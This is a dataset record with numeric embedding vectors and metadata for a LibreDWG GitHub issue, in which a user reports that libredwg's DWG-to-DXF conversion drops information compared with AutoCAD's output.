0.0126795070245862, 0.026079118251800537, 0.0026951010804623365, 0.01362552773207426, -0.008217675611376762, 0.008019999600946903, 0.008648327551782131, 0.012926601804792881, -0.001397852087393403, 0.014373872429132462, 0.011549929156899452, -0.005626707337796688, 0.026022639125585556, 0.004041769076138735, -0.01712721772491932, 0.015418731607496738, 0.0065550790168344975, -0.009255475364625454, 0.004903072025626898, 0.008457710966467857, -0.023170456290245056, 0.007243415340781212, -0.016844823956489563, 0.0000032748368994361954, 0.018976900726556778, 0.01759316772222519, -0.00022415051353164017, 0.007271654438227415, 0.019358133897185326, -0.0057467250153422356, 0.020162956789135933, -0.003528164466843009, 0.0018955720588564873, 0.00665744673460722, 0.011535809375345707, 0.001955580897629261, -0.001593763125129044, 0.002068538684397936, -0.025429612025618553, -0.0035422842483967543, 0.004299453925341368, 0.0004941901424899697, 0.0140702985227108, -0.01430327445268631, -0.012594788335263729, 0.015009259805083275, -0.001810853835195303, -0.008768344298005104, -0.01169818639755249, -0.017084859311580658, -0.0035881733056157827, -0.011528749950230122, 0.02345285192131996, 0.030611548572778702, -0.004850123077630997, -0.006999850273132324, -0.02626267448067665, -0.01568700559437275, -0.023537568747997284, 0.0006786289159208536, -0.01859566755592823, 0.011034559458494186, 0.025373132899403572, -0.025994399562478065, -0.007871742360293865, -0.007681126240640879, 0.0026739216409623623, 0.012820703908801079, 0.0102085554972291, -0.00430651381611824, -0.00811883807182312, 0.005167816765606403, -0.0013431381667032838, 0.01097102090716362, -0.009643767029047012, -0.017042499035596848, -0.0015796434599906206, -0.029736125841736794, 0.01764964684844017, 0.014755104668438435, 0.007589348126202822, -0.00643506133928895, -0.020247675478458405, -0.00003342402123962529, -0.02195616066455841, -0.004246504977345467, -0.012319453991949558, -0.0032863642554730177, -0.008796583861112595, -0.00776584492996335, -0.007476390339434147, 0.015178696252405643, 0.012164137326180935, -0.0008617440471425653, -0.006639797240495682, -0.011324013583362103, 0.026968661695718765, -0.013950280845165253, 0.0031592869199812412, -0.012757165357470512, 0.019809963181614876, 0.00020572870562318712, -0.01429621409624815, -0.025528449565172195, 0.00023827023687772453, 0.0004425648949109018, 0.0041829664260149, 0.022182077169418335, 0.01289836224168539, -0.0019379312871024013, -0.009919101372361183, 0.005414911545813084, -0.004730105400085449, 0.0025697886012494564, 0.009608468040823936, 0.031204575672745705, 0.014260915108025074, 0.008132957853376865, 0.01579996384680271, 0.014698626473546028, -0.028507709503173828, 0.018736865371465683, 0.0057502551935613155, 0.004779524635523558, -0.018440350890159607, 0.0028327684849500656, -0.012361813336610794, -0.015602287836372852, -0.01122517604380846, -0.016986019909381866, -0.016505949199199677, -0.04727281630039215, -0.007617587689310312, 0.02050182968378067, 0.010406232438981533, 0.0133219538256526, -0.011931161396205425, -0.002495660213753581, 0.004034709185361862, 0.022563308477401733, 0.0006993672577664256, -0.0009301364189013839, -0.00316987675614655, 0.006618617568165064, -0.005083098541945219, -0.005065448582172394, -0.04919309541583061, 0.015997640788555145, -0.005760844796895981, -0.01626591570675373, -0.01908985897898674, -0.004246504977345467, 0.014133837074041367, 0.01026503462344408, -0.009001320227980614, 0.003466390771791339, -0.01581408455967903, -0.024074118584394455, -0.0023332834243774414, 0.004186496138572693, 0.03109161928296089, -0.005792614072561264, 0.01122517604380846, -0.003374612657353282, -0.01676010526716709, -0.018849823623895645, 0.001994410064071417, -0.005139577202498913, 0.013011319562792778, -0.008161196485161781, -0.010385052300989628, -0.00585968280211091, -0.002393292263150215, 0.0010607438161969185, 0.010201496072113514, 0.0029916150961071253, -0.01116163656115532, 0.006145607214421034, -0.0006283274269662797, -0.026403872296214104, -0.01759316772222519, -0.002783349482342601, -0.005474920384585857, -0.009142517112195492, -0.011832323856651783, -0.0059867603704333305, 0.019880563020706177, 0.006067948881536722, -0.0003229885478504002, 0.014670386910438538, 0.0016573019092902541, 0.001468450645916164, 0.004514779895544052, 0.015376372262835503, -0.012912482023239136, -0.022535068914294243, -0.008380052633583546, -0.00656213890761137, 0.004663036670535803, -0.013773784972727299, 0.0008979258127510548, 0.008196496404707432, 0.004091188311576843, -0.018468590453267097, -0.007063388824462891, 0.010335633531212807, 0.02517545595765114, 0.028493590652942657, -0.005051329266279936, -0.005944401025772095, -0.023707006126642227, 0.021306654438376427, -0.004737165290862322, -0.004394762217998505, -0.0031292825005948544, 0.004327693488448858, -0.013399612158536911, -0.005100748036056757, -0.024187076836824417, -0.013999700546264648, 0.007215175777673721, -0.001397852087393403, -0.006766874808818102, -0.017988519743084908, -0.0031222226098179817, -0.022309154272079468, 0.011881742626428604, -0.012354752980172634, 0.011754664592444897, -0.015319894067943096, 0.000931018905248493, 0.010766284540295601, 0.0379820391535759, -0.019880563020706177, -0.008634207770228386, -0.01194528117775917, -0.014204435981810093, 0.009276654571294785, 0.010095598176121712, -0.012552428990602493, 0.013978520408272743, -0.014599788002669811, -0.016407111659646034, 0.004719515796750784, 0.00008554563100915402, 0.0030057348776608706, -0.014599788002669811, -0.034508589655160904, 0.004119427874684334, 0.009347253479063511, -0.010173256509006023, -0.008351813070476055, 0.012856002897024155, -0.010603908449411392, -0.02710985764861107, 0.0010077948682010174, -0.007956461049616337, -0.0054360912181437016, -0.005806733854115009, -0.0017623172607272863, 0.0021797313820570707, -0.004324163775891066, 0.027829963713884354, 0.011387552134692669, 0.005083098541945219, 0.016082359477877617, 0.002543314127251506, -0.003568758722394705, -0.010152077302336693, 0.0035158097743988037, 0.014423292130231857, 0.013879682868719101, -0.006166786886751652, -0.000011934194844798185, 0.0062267957255244255, -0.0008017352083697915, 0.02237975224852562, 0.02096778154373169, 0.00560905784368515, 0.0016070003621280193, 0.0024921302683651447, -0.004804234020411968, -0.010766284540295601, 0.016957780346274376, -0.014437410980463028, -0.00906485877931118, -0.006477420683950186, -0.005785554181784391, -0.009481390938162804, -0.01766376756131649, -0.00250448496080935, 0.014811583794653416, 0.009248415008187294, 0.016124717891216278, -0.02951020933687687, -0.0019714655354619026, 0.009968521073460579, 0.016774224117398262, 0.011267534457147121, -0.028973661363124847, -0.0031592869199812412, -0.008648327551782131, 0.0322776734828949, -0.016054119914770126, -0.00015520658052992076, 0.01527753472328186, 0.00036689205444417894, 0.008796583861112595, -0.022633908316493034, 0.01671774499118328, 0.011436971835792065, -0.002174436580389738, 0.0028521830681711435, 0.0017764370422810316, 0.0024162367917597294, 0.015108098275959492, 0.01618119701743126, 0.0092695951461792, -0.008655386976897717, 0.005171346478164196, 0.013745545409619808, -0.010222675278782845, 0.008203555829823017, 0.021659646183252335, -0.02236563339829445, -0.031176336109638214, -0.011062799021601677, -0.0010272094514220953, 0.0053831422701478004, -0.0019485210068523884, -0.021603168919682503, -0.0008083538268692791, 0.016971901059150696, 0.029284294694662094, -0.004610087722539902, -0.02187144197523594, 0.02670038677752018, -0.010307393968105316, 0.013208995573222637, -0.00713398726657033, 0.0200358796864748, 0.0056196474470198154, 0.0033040139824151993, 0.002770994557067752, 0.002951021073386073, -0.011062799021601677, 0.014169136993587017, -0.0009292539325542748, -0.009439031593501568, -0.00548551045358181, 0.014825703576207161, 0.015588168054819107, 0.007088098209351301, 0.020233554765582085, -0.010032059624791145, 0.023636408150196075, -0.0009371962514705956, 0.0032934241462498903, -0.010949840769171715, -0.004098248202353716, -0.01622355543076992, 0.007123397663235664, -0.017776723951101303, 0.010060299187898636, -0.005065448582172394, 0.001035151770338416, 0.01096396055072546, -0.01904749870300293, -0.017946161329746246, -0.016322392970323563, -0.014882182702422142, -0.007744665257632732, 0.008443591184914112, 0.016124717891216278, 0.019428731873631477, 0.016421232372522354, 0.013526689261198044, -0.005947931203991175, 0.0036252376157790422, 0.018412111327052116, 0.010787464678287506, -0.0022715094964951277, -0.0009327838779427111, -0.027491090819239616, -0.002038534265011549, -0.009403731673955917, -0.047442249953746796, -0.02665802650153637, 0.003259889781475067, -0.022139716893434525, -0.006022059824317694, -0.024469470605254173, 0.01911809854209423, 0.01116869691759348, 0.009686126373708248, 0.022577429190278053, 0.00909309834241867, -0.006706865970045328, 0.001479922910220921, -0.004832473583519459, -0.00974260549992323, -0.0029774955473840237, -0.012326513417065144, -0.017819084227085114, -0.023170456290245056, -0.021603168919682503, -0.009968521073460579, -0.00773760536685586, 0.010526249185204506, 0.012961900793015957, 0.009326073341071606, 0.00013171049067750573, -0.027053378522396088, -0.017550809308886528, 0.013420791365206242, 0.014952780678868294, -0.006375052500516176, -0.021645527333021164, -0.02818295732140541, -0.0027568750083446503, 0.0071763466112315655, 0.014225616119801998, -0.016322392970323563, -0.012983080931007862, 0.003339313203468919, 0.0019591108430176973, 0.01021561585366726, 0.0066609769128263, 0.005150167271494865, 0.022125598043203354, 0.013682006858289242, -0.007949400693178177, -0.002070303540676832, -0.012029999867081642, 0.010610967874526978, 0.0219844002276659, 0.0009195466409437358, 0.009078978560864925, 0.011818204075098038, 0.02626267448067665, 0.0071022179909050465, -0.014712746255099773, 0.005023089703172445, 0.008048239164054394, 0.004694805946201086, -0.028719505295157433, -0.00957316905260086, -0.002038534265011549, -0.00979202426970005, -0.008436531759798527, 0.010603908449411392, 0.010032059624791145, -0.0024197667371481657, 0.01859566755592823, -0.032616548240184784, -0.011211056262254715, 0.016407111659646034, 0.006219735834747553, 0.0010466240346431732, 0.004574788734316826, 0.02053006924688816, -0.006276214495301247, -0.009827323257923126, -0.03620295599102974, 0.021179577335715294, 0.0334637314081192, -0.01004617940634489, -0.02297278121113777, 0.011613467708230019, -0.013413731940090656, 0.002548609161749482, 0.007006910163909197, 0.014034999534487724, 0.005873802583664656, 0.029764365404844284, -0.006805703975260258, 0.0022626847494393587, -0.015037499368190765, 0.0014525660080835223, -0.002140902215614915, -0.0009777904488146305, -0.013547869399189949, -0.007518749684095383, -0.03044211119413376, 0.013886742293834686, 0.013745545409619808, -0.021645527333021164, 0.009813203476369381, -0.007144577335566282, 0.0010819233721122146, -0.008097657933831215, 0.027321653440594673, -0.007582288235425949, 0.02137725241482258, 0.0071763466112315655, -0.02240799181163311, 0.00393234146758914, 0.006251505110412836, 0.012884242460131645, 0.008260034956037998, -0.010229735635221004, 0.015489330515265465, -0.010250914841890335, 0.0043382830917835236, -0.0016617142828181386, 0.00513251731172204, -0.01169112604111433, 0.014684506691992283, 0.004952490795403719, -0.0008154137176461518, -0.016562428325414658, 0.012834823690354824, 0.013632587157189846, 0.003538754303008318, 0.02332577295601368, 0.016449471935629845, -0.006138547323644161, -0.02144785039126873, -0.007186936214566231, -0.027942921966314316, 0.026375632733106613, 0.0037593748420476913, -0.015602287836372852, -0.03662654757499695, 0.0067739346995949745, 0.010483890771865845, 0.01722605526447296, 0.002619207603856921, -0.0046347975730896, -0.022252675145864487, -0.03623119741678238, -0.008104718290269375, -0.015955280512571335, 0.005665536969900131, -0.007006910163909197, 0.01572936587035656, 0.018454471603035927, -0.013971460983157158, -0.004002939909696579, 0.002110897796228528, -0.035496968775987625, 0.000858655315823853, 0.008493009954690933, 0.0033587277866899967, -0.016986019909381866, -0.00831651408225298, 0.014557428658008575, 0.0025839083828032017, -0.005210175644606352, -0.02805587835609913, 0.03521457687020302, -0.01382320374250412, -0.02962316758930683, 0.004006470087915659, -0.012037059292197227, 0.01858154870569706, -0.0219844002276659, 0.013787904754281044, -0.0032987191807478666, 0.00761052779853344, 0.010872182436287403, 0.01071686577051878, 0.00014505803119391203, 0.0003611558931879699, 0.021179577335715294, -0.0018567428924143314, 0.0039570508524775505, 0.013682006858289242, 0.006650386843830347, 0.005323133431375027, 0.018030880019068718, -0.004250035155564547, -0.0009530809475108981, 0.021193696185946465, 0.002659801859408617, 0.018426232039928436, -0.011556988582015038, -0.01859566755592823, 0.01118987612426281, 0.009982640855014324, 0.0021179576870054007, 0.001118987682275474, 0.011182816699147224, 0.03295542299747467, -0.00586321298032999, 0.01572936587035656, -0.003794674063101411, -0.006488010287284851, -0.02905838005244732, -0.004348873160779476, -0.0011269300011917949, -0.022690385580062866, -0.010257975198328495, -0.001118105137720704, 0.00904367957264185, 0.00022415051353164017, 0.007363433018326759, 0.030724504962563515, 0.017042499035596848, -0.0021091329399496317, -0.018299154937267303, -0.00031504619983024895, -0.009897922165691853, 0.018313273787498474, -0.003724075620993972, 0.013272535055875778, 0.017268415540456772, 0.008019999600946903, 0.005266654770821333, 0.013434911146759987, -0.009707305580377579, -0.007596408016979694, 0.017776723951101303, -0.019626406952738762, -0.0038017339538782835, 0.012820703908801079, -0.01001087948679924, -0.011564048938453197, -0.014811583794653416, -0.015489330515265465, 0.004617147613316774, -0.015828203409910202, -0.012863063253462315, -0.003717015730217099, -0.0006565668736584485, 0.02235151268541813, 0.0027445200830698013, -0.0063715227879583836, 0.004846592899411917, 0.01952756941318512, -0.023509329184889793, 0.009022499434649944, 0.0019096918404102325, -0.004490070044994354, -0.017550809308886528, 0.0021991459652781487, -0.02202676050364971, 0.002185026416555047, -0.01721193641424179, 0.006576258689165115, 0.0036887761671096087, -0.014020879752933979, -0.0031945861410349607, 0.009121337905526161, 0.005033679306507111, 0.00903661921620369, -0.001271657063625753, -0.03145873174071312, 0.02520369552075863, 0.0005603763274848461, 0.010201496072113514, 0.01571524515748024, -0.00019635232456494123, -0.011655827052891254, 0.009502570144832134, 0.01382320374250412, 0.0009336663642898202, -0.004070008639246225, 0.010709806345403194, 0.002906896872445941, -0.02245035208761692, -0.004772464744746685, -0.011959400959312916, -0.01505161914974451, 0.01169112604111433, -0.004440651275217533, 0.018383871763944626, 0.006255034822970629, 0.005432561505585909, 0.001004264922812581, -0.0012443001614883542, -0.017028380185365677, -0.0224362313747406, -0.0007192231132648885, -0.0075611090287566185, 0.00884600356221199, -0.005284304264932871, -0.010116777382791042, -0.005446681287139654, -0.011500510387122631, -0.004846592899411917, 0.012347693555057049, -0.0013501980574801564, -0.0056937760673463345, -0.011789964511990547, 0.019795844331383705, 0.034084998071193695, 0.01903337985277176, -0.00012266504927538335, 0.005658477079123259, -0.008909542113542557, 0.00513251731172204, -0.020868942141532898, -0.010074418969452381, -0.003600527998059988, 0.03100690059363842, -0.02764640748500824, 0.005718485917896032, 0.0029916150961071253, -0.006604497786611319, -0.005337253212928772, 0.020290033891797066, -0.019400492310523987, 0.010166197083890438, 0.010632147081196308, 0.0051466370932757854, -0.009806144051253796, -0.009806144051253796, -0.0009698481298983097, 0.0008665976929478347, 0.012820703908801079, -0.009001320227980614, 0.01287718303501606, 0.003176936414092779, 0.01818619668483734, 0.023565808311104774, -0.0051466370932757854, -0.0048924824222922325, 0.018355632200837135, 0.0024780104868113995, -0.019301654770970345, -0.0016811288660392165, -0.011451090686023235, 0.004610087722539902, 0.021108977496623993, -0.003189291339367628, 0.004094718024134636, 0.0027251054998487234, 0.001800263999029994, -0.0043594627641141415, -0.0038899823557585478, 0.0010889832628890872, -0.001344020594842732, 0.0024762453977018595, -0.014910422265529633, 0.006375052500516176, 0.013914981856942177, 0.016025880351662636, 0.015574048273265362, -0.00256802374497056, 0.029679646715521812, 0.025514330714941025, -0.003362257732078433, 0.017847323790192604, -0.01479746401309967, 0.012439471669495106, 0.010413291864097118, -0.03159992769360542, 0.020148837938904762, 0.011140457354485989, 0.017042499035596848, -0.0050725084729492664, 0.011556988582015038, 0.014585668221116066, 0.0228880625218153, -0.005651417188346386, -0.005157226696610451, 0.009679066948592663, 0.016901303082704544, 0.007398732006549835, 0.01046271063387394, 0.016873063519597054, -0.011514630168676376, -0.0016290624625980854, 0.026559188961982727, -0.0056761265732347965, 0.00046903936890885234, -0.0037593748420476913, -0.019937042146921158, -0.013646706938743591, -0.013766724616289139, 0.01046271063387394, 0.0042853341437876225, -0.0017287828959524632, 0.003341078292578459, 0.00535843288525939, -0.00548198027536273, -0.018863942474126816, -0.009608468040823936, 0.002945726038888097, 0.0016228851163759828, -0.02667214721441269, 0.011987640522420406, 0.012721865437924862, 0.015927040949463844, 0.010752164758741856, -0.013067798689007759, -0.002357992809265852, -0.013865563087165356, -0.03239063173532486, 0.0019291064236313105, -0.014155017212033272, 0.007659947033971548, -0.016844823956489563, -0.007970580831170082, -0.001996175153180957, 0.0006428884225897491, -0.017804963514208794, -0.030611548572778702, 0.0009363137651234865, 0.001768494606949389, 0.02725105546414852, -0.010547429323196411, 0.01144403126090765, 0.007582288235425949, 0.017437851056456566, 0.0036287675611674786, 0.0014137367252260447, 0.0002834974729921669, -0.00345403584651649, -0.00008173992682714015, -0.018835702911019325, -0.013717305846512318, 0.012347693555057049, -0.00025305181043222547, 0.002649212023243308, -0.004094718024134636, -0.003978230524808168, -0.009156636893749237, 0.007815264165401459, 0.023636408150196075, -0.0037099558394402266, -0.00974260549992323, 0.008034119382500648, -0.001118105137720704, -0.003081628354266286, 0.003383437404409051, -0.011493450030684471, -0.00351933971978724, -0.014642147347331047, -0.0050089699216187, 0.0009460211149416864, 0.004684216342866421, -0.002940431237220764, -0.013724365271627903, 0.011867622844874859, 0.016378872096538544, -0.023565808311104774, -0.009806144051253796, 0.01547521073371172, -0.01337843295186758, 0.004091188311576843, -0.01122517604380846, 0.010363873094320297, -0.0058349734172225, 0.001386379823088646, 0.02098190039396286, 0.006417411845177412, -0.003153991885483265, 0.03809499740600586, 0.006117367651313543, -0.017847323790192604, -0.01261596754193306, -0.0036146477796137333, 0.016350632533431053, 0.01144403126090765, -0.025118978694081306, -0.010152077302336693, -0.029453732073307037, -0.014366813004016876, 0.0036464170552790165, 0.008888361975550652, -0.010286214761435986, 0.0027568750083446503, -0.01026503462344408, 0.016901303082704544, -0.012453591451048851, 0.00020826583204325289, 0.008676566183567047, 0.03233415260910988, -0.00979202426970005, 0.003023384604603052, -0.007045739330351353, 0.02103837952017784, -0.008711866103112698, 0.049362532794475555, 0.0077799647115170956, 0.0010113248135894537, 0.017056619748473167, -0.006198556162416935, 0.006523309741169214, -0.0002645240747369826, 0.004663036670535803, 0.005972640588879585, 0.0015275769401341677, -0.007525809574872255, 0.005923221819102764, 0.0042676846496760845, 0.0010589788435027003, -0.02713809721171856, 0.006092658266425133, 0.00558434845879674, -0.004867772571742535, -0.009820263832807541, -0.031741127371788025, -0.004299453925341368, 0.008238855749368668, 0.005238415207713842, -0.011980580165982246, 0.01865214668214321, 0.015235175378620625, 0.003921751398593187, -0.029820844531059265, -0.0045959679409861565, 0.014783344231545925, 0.020614787936210632, -0.012044119648635387, -0.015602287836372852, 0.0021885563619434834, 0.012128837406635284, -0.0041229575872421265, 0.009396672248840332, 0.015418731607496738, -0.016124717891216278, -0.006978670600801706, 0.010349753312766552, 0.0027568750083446503, -0.01430327445268631, 0.017932042479515076, -0.014211496338248253, 0.0014446235727518797, 0.0018708625575527549, 0.014938661828637123, 0.034621547907590866, 0.03044211119413376, -0.009149577468633652, 0.018680386245250702, -0.004539489280432463, 0.006682156585156918, 0.006233855616301298, -0.02333989366889, 0.012559489347040653, -0.01571524515748024, -0.021631408482789993, -0.030216196551918983, 0.0028292385395616293, 0.004327693488448858, -0.01860978826880455, -0.0028310033958405256, -0.017875563353300095, 0.00014351369463838637, -0.004588908050209284, -0.005651417188346386, 0.0074128517881035805, 0.017466090619564056, -0.008154137060046196, -0.008464770391583443, -0.018016759306192398, -0.017353132367134094, -0.01427503488957882, -0.016604788601398468, -0.004384172149002552, 0.00001751176023390144, 0.0008736575255170465, -0.0012998965103179216, -0.0077799647115170956, -0.0009592583519406617, 0.001665244228206575, -0.0022785693872720003, 0.0019255764782428741, -0.01547521073371172, -0.0059302812442183495, 0.002066773595288396, 0.009551988914608955, -0.002112662885338068, 0.01618119701743126, 0.01575760543346405, -0.019344013184309006, -0.0038158537354320288, 0.007998820394277573, 0.006526839453727007, 0.01360434852540493, 0.010978080332279205, 0.009813203476369381, 0.0007501100189983845, 0.0007258417317643762, 0.004355933051556349, -0.026982780545949936, 0.001034269342198968, 0.0025644937995821238, -0.005139577202498913, 0.008648327551782131, 0.0014781579375267029, -0.021673766896128654, 0.004620677791535854, 0.01287718303501606, -0.009594348259270191, -0.01712721772491932, -0.004133547190576792, 0.00751168979331851, -0.007730545476078987, -0.0010722160805016756, -0.014380932785570621, -0.007091628387570381, 0.01709897816181183, -0.013886742293834686, -0.0040311794728040695, -0.001500220037996769, -0.005323133431375027, -0.028338273987174034, -0.016590667888522148, -0.008803644217550755, 0.004278274718672037, 0.0008290921687148511, 0.00010159578232560307, 0.012630087323486805, -0.00931195355951786, 0.013456091284751892, 0.010349753312766552, 0.011775844730436802, 0.009213116019964218, -0.00031835550907999277, 0.00680923368781805, -0.004239445086568594, 0.008577728644013405, 0.003009264823049307, 0.02002175897359848, -0.0019732306245714426, 0.002585673239082098, -0.01810147799551487, 0.019824083894491196, 0.01116869691759348, -0.018002640455961227, -0.005178406368941069, 0.009156636893749237, 0.003935871180146933, 0.010363873094320297, 0.008005879819393158, 0.010596848092973232, 0.013364313170313835, 0.002213265746831894, 0.008683626540005207, 0.0204171109944582, -0.021052498370409012, -0.0017834968166425824, 0.00020032349857501686, 0.019358133897185326, 0.0010898656910285354, -0.010561549104750156, -0.002310338895767927, 0.0004955138429068029, 0.009255475364625454, 0.0126795070245862, 0.02249271050095558, 0.006682156585156918, -0.007645827252417803, -0.0029351364355534315, 0.010660386644303799, -0.012566548772156239, 0.010307393968105316, -0.002470950596034527, 0.01188880205154419, 0.008987200446426868, 0.026530949398875237, 0.0014772755093872547, -0.01575760543346405, 0.03275774419307709, -0.025613168254494667, -0.001065156189724803, 0.03188232332468033, -0.03634415194392204, -0.005909102037549019, -0.017084859311580658, 0.00007026765524642542, 0.02627679519355297, 0.01618119701743126, -0.005577288568019867, 0.005877332296222448, 0.008980140089988708, 0.008450651541352272, 0.019428731873631477, 0.017536688596010208, 0.004768934566527605, 0.025104857981204987, -0.012093538418412209, 0.010808643884956837, -0.023466970771551132, 0.01479746401309967, 0.003971170634031296 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hi, I have attached three files. one original DWG file and two dxf files one created using libreDWG and other using AutoCAD. The file created using libredwg is not having all information, some information are missing. [test.zip](https://github.com/LibreDWG/libredwg/files/11014459/test.zip)
To DXF is not converting all informations (AME)
https://api.github.com/repos/LibreDWG/libredwg/issues/666/comments
7
2023-03-20T05:33:39
2023-04-01T06:41:52Z
https://github.com/LibreDWG/libredwg/issues/666
1,631,418,807
666
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : To DXF is not converting all informations (AME) Issue date: --- start body --- Hi, I have attached three files. one original DWG file and two dxf files one created using libreDWG and other using AutoCAD. The file created using libredwg is not having all information, some information are missing. [test.zip](https://github.com/LibreDWG/libredwg/files/11014459/test.zip) --- end body ---
455
[ -0.013120688498020172, 0.02654162049293518, -0.004492409527301788, 0.0017442334210500121, 0.031435608863830566, 0.05233263224363327, 0.030399763956665993, 0.04020274803042412, -0.022383233532309532, -0.002694695023819804, -0.010193303227424622, -0.025986168533563614, -0.008489415980875492, -0.0037436746060848236, -0.012610272504389286, 0.029333895072340965, 0.006702960468828678, 0.0015687779523432255, 0.005922324489802122, -0.03269663453102112, -0.0005770325660705566, 0.011874672956764698, 0.04581732302904129, 0.042004216462373734, 0.0008894745842553675, 0.002458252478390932, -0.013661128468811512, 0.00034317016252316535, 0.012054819613695145, 0.00525803305208683, 0.02187281847000122, 0.012497681193053722, 0.010065699927508831, 0.01751927100121975, 0.02861330844461918, 0.013811251148581505, 0.03362739458680153, 0.05692637339234352, -0.028748419135808945, 0.0400526262819767, -0.02002631314098835, -0.05659610405564308, -0.014359197579324245, 0.008046554401516914, -0.02837311290204525, 0.02019144780933857, -0.011101542972028255, 0.03122543729841709, -0.03371746838092804, 0.02287863753736019, -0.0031769629567861557, -0.007089524995535612, -0.031255461275577545, -0.011199123226106167, -0.007941469550132751, 0.004616260528564453, 0.06659425050020218, 0.04320519417524338, -0.03179590031504631, 0.006308889482170343, 0.020927047356963158, 0.02437986060976982, 0.020491693168878555, 0.040593069046735764, -0.019635995849967003, 0.0018427511677145958, -0.03945213928818703, 0.03930201753973961, -0.041193556040525436, 0.006181285250931978, 0.01477203331887722, 0.0012779160169884562, 0.01861516386270523, 0.013818756677210331, 0.02871839515864849, -0.05716656893491745, -0.005089145619422197, 0.028313064947724342, 0.005438180174678564, 0.0006380197592079639, -0.00034739237162284553, 0.03620949760079384, -0.013180737383663654, 0.0254457276314497, -0.0047964071854949, 0.00294239679351449, -0.042934976518154144, -0.06413224339485168, -0.027097074314951897, 0.005963608156889677, -0.009765454567968845, 0.012677827849984169, -0.0083467997610569, -0.0400526262819767, -0.00676300935447216, -0.018059711903333664, -0.0032539006788283587, -0.0014580627903342247, -0.059958841651678085, -0.03611942380666733, -0.032666608691215515, 0.01854010298848152, -0.006188791245222092, -0.008069072850048542, 0.050621237605810165, 0.0017357890028506517, 0.024650080129504204, -0.01951589807868004, 0.026016192510724068, 0.10670692473649979, -0.0010311524383723736, 0.011003963649272919, -0.03644969314336777, -0.00347533100284636, 0.01518486998975277, 0.022968711331486702, 0.0012666567927226424, -0.028523234650492668, 0.020566754043102264, 0.005029096733778715, -0.026721768081188202, -0.05248275399208069, -0.03227629140019417, -0.03828118368983269, -0.016393354162573814, 0.04554710164666176, -0.015492620877921581, -0.013488488271832466, -0.016633549705147743, 0.0017808256670832634, -0.05068128556013107, -0.014967191964387894, 0.045457031577825546, -0.006413974799215794, 0.0010424116626381874, 0.0017920848913490772, -0.037170279771089554, 0.046357762068510056, -0.014726996421813965, 0.014877119101583958, -0.057046469300985336, -0.06335160881280899, 0.016048073768615723, -0.015597705729305744, -0.046027492731809616, -0.0035672809462994337, -0.014164038002490997, 0.00569714093580842, 0.003781205276027322, -0.013090663589537144, -0.01969604380428791, -0.03461819887161255, 0.017924601212143898, -0.0042972504161298275, 0.04104343429207802, -0.014644429087638855, -0.01777447946369648, 0.025265581905841827, -0.012775407172739506, -0.02101712115108967, 0.022578392177820206, -0.021917855367064476, 0.03236636519432068, 0.005580796394497156, -0.03933203965425491, -0.021887829527258873, 0.015177363529801369, -0.007813865318894386, -0.0400826521217823, 0.03290680795907974, -0.019245678558945656, -0.004053301643580198, 0.008279244415462017, -0.0021730202715843916, -0.0525728277862072, 0.003480960614979267, -0.028433162719011307, 0.02110719494521618, -0.01547760795801878, -0.011942228302359581, -0.005982373375445604, -0.013023109175264835, -0.0010011279955506325, 0.0204316433519125, 0.023013746365904808, -0.053203340619802475, 0.028177954256534576, -0.008136628195643425, -0.04128362983465195, -0.01318824291229248, 0.00444361986592412, -0.0021317366044968367, 0.036089397966861725, -0.015244918875396252, 0.030504848808050156, -0.013668634928762913, -0.024740153923630714, -0.03236636519432068, -0.001529370783828199, -0.005922324489802122, 0.0017151471693068743, 0.02469511702656746, -0.01306063961237669, -0.018224846571683884, 0.011529391631484032, 0.03690005838871002, -0.04356548935174942, 0.03119541145861149, -0.009817997924983501, -0.03278670832514763, -0.03119541145861149, -0.010148267261683941, 0.023914480581879616, -0.014779539778828621, 0.020011302083730698, 0.032846756279468536, -0.007292190100997686, -0.015882939100265503, -0.012790419161319733, -0.02119726687669754, 0.02553580142557621, -0.04095336049795151, 0.017324112355709076, 0.021347390487790108, -0.04137370362877846, 0.0038956734351813793, 0.008729611523449421, -0.005896052811294794, -0.02286362461745739, 0.026676731184124947, 0.07920452207326889, -0.03987247869372368, 0.010148267261683941, 0.023329004645347595, -0.036599814891815186, -0.009502740576863289, -0.0008974498487077653, 0.0014787046238780022, -0.03036973997950554, -0.023674285039305687, -0.005550771486014128, 0.05998886749148369, -0.008549464866518974, -0.031765878200531006, -0.0033308384008705616, 0.02020646072924137, 0.028688369318842888, 0.02828303910791874, 0.009607826359570026, 0.033086951822042465, 0.0559055395424366, -0.009022349491715431, 0.03464822471141815, 0.012610272504389286, -0.009149953722953796, 0.0043685585260391235, 0.044015854597091675, 0.03846133127808571, -0.05584549158811569, -0.04116353392601013, 0.021422451362013817, 0.007265918888151646, -0.00409083254635334, -0.0035597747191786766, -0.007243400439620018, -0.019140591844916344, -0.015537656843662262, 0.0008247343357652426, -0.012227460741996765, 0.02112220600247383, -0.010861347429454327, -0.03602935001254082, -0.008271737955510616, -0.008759635500609875, -0.010035675019025803, 0.01693379506468773, -0.012662814930081367, -0.004394830204546452, 0.016048073768615723, -0.05635590851306915, -0.025911107659339905, 0.012069832533597946, 0.012287509627640247, 0.021587586030364037, -0.0048001604154706, -0.013405920937657356, -0.013961372897028923, -0.007273424882441759, -0.020927047356963158, -0.01993623934686184, -0.02011638693511486, -0.020161423832178116, -0.04332529380917549, -0.012069832533597946, -0.012767900712788105, 0.01005068700760603, 0.018810322508215904, -0.026901913806796074, 0.011777093634009361, -0.009405161254107952, 0.01751927100121975, 0.00392569787800312, 0.005993632599711418, -0.026661718264222145, 0.017969638109207153, 0.029919372871518135, -0.021137218922376633, 0.03302690386772156, -0.011514379642903805, -0.02610626630485058, 0.029739225283265114, -0.01280543114989996, -0.01423159334808588, -0.0015040376456454396, 0.005381884053349495, -0.025640888139605522, 0.023163869976997375, -0.046267688274383545, 0.004788901191204786, -0.02813291735947132, -0.018900396302342415, 0.009825504384934902, -0.010906384326517582, 0.0030868896283209324, 0.014877119101583958, -0.027097074314951897, -0.013023109175264835, 0.029258834198117256, -0.01935076341032982, 0.015717804431915283, -0.01259526051580906, 0.00640271557494998, 0.004285991191864014, 0.006098717916756868, -0.02963414043188095, -0.032666608691215515, 0.0057459305971860886, -0.03095521591603756, -0.008166652172803879, -0.027352280914783478, -0.021422451362013817, 0.026091253384947777, -0.02954406663775444, -0.019726069644093513, 0.052272580564022064, -0.021572573110461235, 0.030144555494189262, -0.008872227743268013, 0.029333895072340965, -0.01185215450823307, 0.0009026102488860488, 0.0250253863632679, -0.01531997974961996, 0.005291810724884272, 0.00022025755606591702, -0.007637471426278353, 